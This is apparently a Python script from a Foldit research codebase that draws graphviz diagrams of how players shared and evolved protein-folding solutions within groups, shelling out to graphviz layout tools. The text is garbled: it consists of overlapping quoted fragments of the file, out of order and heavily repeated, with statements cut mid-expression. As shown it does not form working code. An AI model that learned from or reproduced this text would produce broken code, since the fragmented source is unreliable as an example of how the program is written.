targets} roots =", "source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid, pdbs in", "use command line graphviz tools to fix cluster layout outname = \"collab_viz/collab_{}\".format(pid) with", "graphviz import Digraph from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from util", "[]))), lambda p: p[0])} for gid, uids in groups_uids.items(): cdict[gid] = {} group_colors", "if min(e.energy for e in evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True", "p.scoretype == '1' or is_corrupted(p.pdl, p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape,", "= argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args() if args.debug: for pid", "p.energy) child = Collaborator(uid, collab.gid, pdbs, {c.name: c.energy * c.weight for c in", "as np import matplotlib.pyplot as plt from graphviz import Digraph from concurrent.futures import", "euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])} shared = {uid:", "for uid, g in uid_grouped} # further group by source active_uids = list(uid_source_grouped.keys())", "key=lambda p: p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\", df) for uid", "c) for c in collab.children] # while len(front) > 0: # ntab, cur", "for pid in data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid)) df = data[data.pid ==", "{} group_colors = user_colors.setdefault(gid, {}) colors = [col_to_str(c) for c in list(plt.get_cmap('tab20').colors) +", "dict) -> List[Collaborator]: children = [] for uid, pdbs in evolves_by_source[root_tag].items(): 
best =", "d: [x for x in d if x.scoretype == '2' and x.pdl[-1]['actions']]), []))", "[get_source(e)['header']['gid'] for e in active_evolves + passive_evolves]) # cm = plt.get_cmap('tab10' if len(gids)", "for c in collab.children] # while len(front) > 0: # ntab, cur =", "child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in sids] if sids else", "= [(1, c) for c in collab.children] # while len(front) > 0: #", "source['header']['score'])] = True for uid, pdbs in shared.items(): gid = pdbs[0].gid num_ignored =", "lambda p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d", "e in active_evolves + passive_evolves]) # cm = plt.get_cmap('tab10' if len(gids) <= 10", "pdbs: if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return", "for k, g in # groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e:", "evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves))) #", "gid = pdbs[0].gid for p in pdbs: if p.scoretype == '2' and not", "not is_corrupted(p.pdl, p.uid): source = get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9", "logging from itertools import groupby import pandas as pd import numpy as np", "[x for x in d if int(x.sharing_gid) > 1]), []), key=lambda p: euid_lookup[p.sid]),", "further group by source evolved_targets = {target for targets in uid_source_grouped.values() for target", "from itertools import groupby import pandas as pd import numpy as np import", "= groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e: e.uid) # uid_source_grouped = { #", "uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e:", "str pdbs: List[PDB_Info] 
energy_comps: Dict[str, float] tag: ShareTag parent: \"Collaborator\" source: ShareTag children:", "gid in gids} # for uid, evolved_targets in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid", "evolves_by_source = {tag: list(pdbs) for tag, pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda", "start) / (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy),", "data.pid.unique(): print(pid) df = data[data.pid == pid] start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max()", "in r.lines for p in l.pdb_infos] if r.lines else []) + ([p for", "= {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids} evolved = {} #", "s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs) for uid, pdbs", "1 or (int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1][ 'actions'])]), []))),", "\"ccomps -xC {} | dot | gvpack -array_c{} | neato -Tpng -n2 -o", "# for gid in gids} for uid, evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid", "collab.gid, pdbs, {c.name: c.energy * c.weight for c in best.energy_components}, ShareTag(uid, round(best.energy, 4)),", "'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c: for p in pdbs: if \"{}@{:.2f}\".format(uid,", "evolves_by_source)) return children def get_team_structures(data, soln_lookup, child_lookup): collabs = {} for pid in", "# cm = plt.get_cmap('tab10' if len(gids) <= 10 else 'tab20') # for gid,", "l in r.lines for p in l.pdb_infos] if r.lines else []) + ([p", "e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in 
uid_grouped} #", "for k, g in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))} for uid,", "{}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves))) # evoling_start = min(e.timestamp", "0.9 * (evoling_start - start) / (end - start), 0.7) # evolving_time =", "key=lambda p: p.energy) child = Collaborator(uid, collab.gid, pdbs, {c.name: c.energy * c.weight for", "c.energy * c.weight for c in root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag, collab,", "0 and x.scoretype == '2' and x.pdl[-1]['actions'] == {}]), [])) # map gids", "c in cur.children]) if __name__ == '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids',", "in gids} # for uid, evolved_targets in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid #", "evolves_by_source: dict) -> List[Collaborator]: children = [] for uid, pdbs in evolves_by_source[root_tag].items(): best", "get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines: list) -> str: if", "pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared", "if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions'] == {}]), []))", "{} | dot | gvpack -array_c{} | neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1,", "p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\", df) for uid in df.uid}", "{}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict) -> List[Collaborator]: children", "group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), 
shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\")", "evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster) #", "p.energy) not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored),", "[] for uid, pdbs in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p: p.energy) child", "this time for people who just loaded in a shared solution but didn't", "groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))} for uid, g in uid_grouped} #", "[soln_lookup[sid] for sid in sids] if sids else [], {c.name: c.energy * c.weight", "= set([xs[0].gid for xs in shared.values()] + [get_source(e)['header']['gid'] for e in active_evolves +", "group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids} evolved = {}", "for p in l.pdb_infos] if r.lines else []) + ([p for l in", "for gid in groups_uids} evolved = {} # create evolver nodes & edges", "\"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e in evolves) >= target[1]", "p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape = \"box\" if p.scoretype", "active_uids} # screen out anyone who later actively evolved # # evolver_clusters =", "{} or cands[i]['header']['uid'] == e.uid: i += 1 return cands[i] def col_to_str(col): return", "for shared solutions for uid, pdbs in shared.items(): gid = pdbs[0].gid for p", "len([p for p in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in evolved]) # with", "itertools import groupby import pandas as pd import numpy as np import matplotlib.pyplot", "target, evolves in evolved_targets.items(): 
group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e", "group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for", "evolver_clusters.values(): # dot.subgraph(sg) # do it again, this time for people who just", "child, evolves_by_source)) return children def get_team_structures(data, soln_lookup, child_lookup): collabs = {} for pid", "as c: for p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape =", "outname = \"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as out: out.write(dot.source) subprocess.run( \"ccomps -xC {}", "pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines for p in l.pdb_infos]", "else []), key=lambda p: p.timestamp), axis=1) shared = {uid: list(pdbs) for uid, pdbs", "e: get_source_tag(e)), lambda e: get_source_tag(e))} for uid, g in uid_grouped} # further group", "+ [get_source(e)['header']['gid'] for e in active_evolves + passive_evolves]) # cm = plt.get_cmap('tab10' if", "Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid in gids} for", "4)) def get_evolver_uid(s: PDB_Info, lines: list) -> str: if s.scoretype == \"1\": return", "<filename>foldit/collab_viz.py<gh_stars>0 import colorsys import subprocess import argparse import os import csv import json", "False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid, pdbs in shared.items(): gid = pdbs[0].gid", "by source evolved_targets = {target for targets in uid_source_grouped.values() for target in targets}", "num_ignored), 'forcelabels': 'true', # 'style': 'filled', 
'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c:", "'0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)})", "c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) # front = [(1, c) for c in", "- start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])]", "df = data[data.pid == pid] pdb_infos = df.apply(lambda r: sorted(([p for l in", "{ uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda", "shell=True, check=True) class ShareTag(NamedTuple): uid: str energy: float class Collaborator(NamedTuple): uid: str gid:", "for p in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) evol_lines_lookup", "if x.scoretype == '2' and x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]),", "'__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args() if args.debug:", "evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in", "in groupby(sorted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid) > 1]),", "0xff))) def is_corrupted(pdl, uid): return all(p['actions'] == {} or p['header']['uid'] == uid or", "*target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves))) # evoling_start = min(e.timestamp for", "pid, 
\"evol_target_lines\", df) for uid in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for", "{c.name: c.energy * c.weight for c in best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag,", "parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag: return ShareTag(s.uid,", "c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) # front = [(1, c) for c", "evolved # # evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label':", "else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster) # output raw", "nargs='+') args = parser.parse_args() if args.debug: for pid in args.pids: render_collab(pid) else: with", "evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True #", "uid or p['header']['uid'] == '0' or p['header']['score'] == 9999.99 for p in pdl)", "pdbs in shared.items(): gid = pdbs[0].gid num_ignored = len([p for p in pdbs", "ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as", "euid_lookup[e.sid]) # group by evolver uid_source_grouped = { uid: {k: list(g) for k,", "r.lines else []) + ([p for l in r.evol_target_lines for p in l.pdb_infos]", "== 9999.99 or cands[i]['actions'] == {} or cands[i]['header']['uid'] == e.uid: i += 1", "cm.colors): # cdict[gid] = col_to_str(c) groups_uids = {gid: [uid for _, uid in", "0.1 + 0.9 * (evoling_start - start) / (end - start), 0.7) #", "but didn't do anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e:", "if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape = \"box\" if p.scoretype == '1' or", "e.uid: i += 1 return 
cands[i] def col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" %", "gids to colors cdict = {} # gids = set([xs[0].gid for xs in", "best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag, []) children.append(child) for pdb in pdbs: if", "label=uid) for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy", "in active_uids} # screen out anyone who later actively evolved # # evolver_clusters", "[p.sid for p in line.pdb_infos] if s.sid in sids: return s.uid + \"evol\"", "'{}_active_evolvers'.format(gid)}) # for gid in gids} for uid, evolved_targets in uid_source_grouped.items(): gid =", "for tag, xs in evolves_by_source.items()} collabs[pid] = [] for root in roots: tag", "pdbs in shared.items(): gid = pdbs[0].gid for p in pdbs: if p.scoretype ==", "who just loaded in a shared solution but didn't do anything # uid_grouped", "<= 10 else 'tab20') # for gid, c in zip(gids, cm.colors): # cdict[gid]", "# evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target),", "or cands[i]['actions'] == {} or cands[i]['header']['uid'] == e.uid: i += 1 return cands[i]", "{}]), [])) # map gids to colors cdict = {} # gids =", "sid in sids] if sids else [], {c.name: c.energy * c.weight for c", "tag: ShareTag parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag:", "evolved: shape = \"box\" if p.scoretype == '1' or is_corrupted(p.pdl, p.uid) else \"diamond\"", "groups_uids = {gid: [uid for _, uid in g] for gid, g in", "e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group by evolver uid_source_grouped = { uid:", "# groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: 
(get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid,", "list(g) for k, g in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))} for", "in d if int(x.sharing_gid) > 1]), []), key=lambda p: p.uid), lambda p: p.uid)}", "from typing import NamedTuple, Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands", "x: euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()} collabs[pid] = [] for root in", "{k: list(g) for k, g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e:", "e.uid) # uid_source_grouped = { # uid: {k: min(g, key=lambda p: p.energy) for", "-n2 -o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple): uid: str energy: float", "open(outname, 'w') as out: out.write(dot.source) subprocess.run( \"ccomps -xC {} | dot | gvpack", "raise ValueError(\"evolver pdb {} not found in any evolver lines for {}\".format(s.sid, (s.uid,", "evolves_by_source.items()} collabs[pid] = [] for root in roots: tag = get_tag(root) sids =", "for e in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\"", "outname), shell=True, check=True) class ShareTag(NamedTuple): uid: str energy: float class Collaborator(NamedTuple): uid: str", "new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors) >= len(new_uids) for uid, c in zip(new_uids,", "graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, #", "for pdbs in shared.values()), []) evolves_by_source = {tag: list(pdbs) for tag, pdbs in", "cands = e.pdl[-2::-1] i = 0 while cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] ==", "0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), 
\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True", "uid, c in zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid] = c dot =", "(end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'],", "x.scoretype == '2' and x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])} for gid, uids", "p in pdbs if p.scoretype == '1' and get_tag(p) in evolved_targets] for pdbs", "cur.children]) if __name__ == '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args", "c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else", "+ 1, c) for c in cur.children]) if __name__ == '__main__': parser =", "pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid) >", "target in targets} roots = sum(([p for p in pdbs if p.scoretype ==", "edges uid_grouped = groupby(sorted(active_evolves, key=lambda e: e.uid), lambda e: e.uid) # group by", "np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e in evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)]", "groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs) for", "get_source(e)['header']['score']))} for uid, g in uid_grouped} # further group by source active_uids =", 
"shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x for", "gid = pdbs[0].gid num_ignored = len([p for p in pdbs if \"{}@{:.2f}\".format(uid, p.energy)", "min(e.energy for e in evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True #", "front.pop() # print(\" \"*ntab, cur.tag) # front.extend([(ntab + 1, c) for c in", "for _, uid in g] for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid,", "d if x.scoretype == '2' and x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda e:", "1 return cands[i] def col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff),", "p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for", "ShareTag(NamedTuple): uid: str energy: float class Collaborator(NamedTuple): uid: str gid: str pdbs: List[PDB_Info]", "= colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp - start) / (end - start),", "c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid, color in group_colors.items():", "== 9999.99 for p in pdl) def remove_corrupted(pdb_infos): return [x for x in", "evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\", df) for uid in df.uid} euid_lookup =", "raw source, then use command line graphviz tools to fix cluster layout outname", "uid_source_grouped.values() for target in targets} roots = sum(([p for p in pdbs if", "is_corrupted(p.pdl, p.uid): source = get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 *", "again, this time for people who just loaded in a shared solution but", "euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in", "create evolver nodes & edges uid_grouped = groupby(sorted(active_evolves, 
key=lambda e: e.uid), lambda e:", "# for target, evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)]", "# map gids to colors cdict = {} # gids = set([xs[0].gid for", "cands[i]['actions'] == {} or cands[i]['header']['uid'] == e.uid: i += 1 return cands[i] def", "d if int(x.sharing_gid) > 1 or (int(x.sharing_gid) == 0 and x.scoretype == '2'", "e in evolves))) # evoling_start = min(e.timestamp for e in evolves) # edge_color", "by evolver uid_source_grouped = { uid: {k: list(g) for k, g in groupby(sorted(g,", "r: sorted(([p for l in r.lines for p in l.pdb_infos] if r.lines else", "in g] for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x", "ShareTag: return ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info) -> ShareTag: source = get_source(s)", "for uid, c in zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid] = c dot", "{} not found in any evolver lines for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag:", "foldit.foldit_data import get_relevant_sids from util import PDB_Info, get_data_value from typing import NamedTuple, Tuple,", "i, line in enumerate(lines): sids = [p.sid for p in line.pdb_infos] if s.sid", "in shared.values()] + [get_source(e)['header']['gid'] for e in active_evolves + passive_evolves]) # cm =", "(p.timestamp - start) / (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3')", "later actively evolved # # evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'},", "lambda x: euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()} collabs[pid] = [] for root", "evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': 
'{}_active_evolvers'.format(gid)}) # for gid", "lambda s: get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs) for uid, pdbs in groupby(sorted(xs,", "'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in gids} # for uid, evolved_targets", "in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves)))", "c in root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs", "p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid'", "evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target, evolves", "import csv import json import logging from itertools import groupby import pandas as", "new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors) >= len(new_uids) for uid, c in", "0.9 * (p.timestamp - start) / (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'],", "else [], {c.name: c.energy * c.weight for c in root.energy_components}, tag, None, None,", "sids: return s.uid + \"evol\" + str(i) raise ValueError(\"evolver pdb {} not found", "pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source = {tag: {uid:", "== '1' or is_corrupted(p.pdl, p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid,", "ValueError(\"evolver pdb {} 
not found in any evolver lines for {}\".format(s.sid, (s.uid, s.pid)))", "cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] == {} or cands[i]['header']['uid'] == e.uid: i +=", "== '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args() if", "{} # gids = set([xs[0].gid for xs in shared.values()] + [get_source(e)['header']['gid'] for e", "for people who just loaded in a shared solution but didn't do anything", "== '2' and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x", "evolves_by_source = {tag: {uid: list(pdbs) for uid, pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]),", "colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp - start) / (end - start), 0.7)", "pdb in pdbs: if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child,", "= e.pdl[-2::-1] i = 0 while cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] == {}", "Collaborator(uid, collab.gid, pdbs, {c.name: c.energy * c.weight for c in best.energy_components}, ShareTag(uid, round(best.energy,", "p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x", "[]), key=lambda p: p.timestamp), axis=1) shared = {uid: list(pdbs) for uid, pdbs in", "as plt from graphviz import Digraph from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import", "PDB_Info, lines: list) -> str: if s.scoretype == \"1\": return s.uid for i,", "== pid] pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines for p", "0 and x.scoretype == '2' and x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])} for", "'{}_passive_evolvers'.format(gid)}) # for gid in gids} # for uid, evolved_targets in uid_source_grouped.items(): #", "# evolved[\"{}@{:.2f}\".format(*target)] = True 
# for sg in evolver_clusters.values(): # dot.subgraph(sg) # nodes", "parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args() if args.debug: for pid in args.pids:", "in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label':", "in pdbs: if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source))", "'w') as out: out.write(dot.source) subprocess.run( \"ccomps -xC {} | dot | gvpack -array_c{}", "label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid])", "e: e.uid) # uid_source_grouped = { # uid: {k: min(g, key=lambda p: p.energy)", 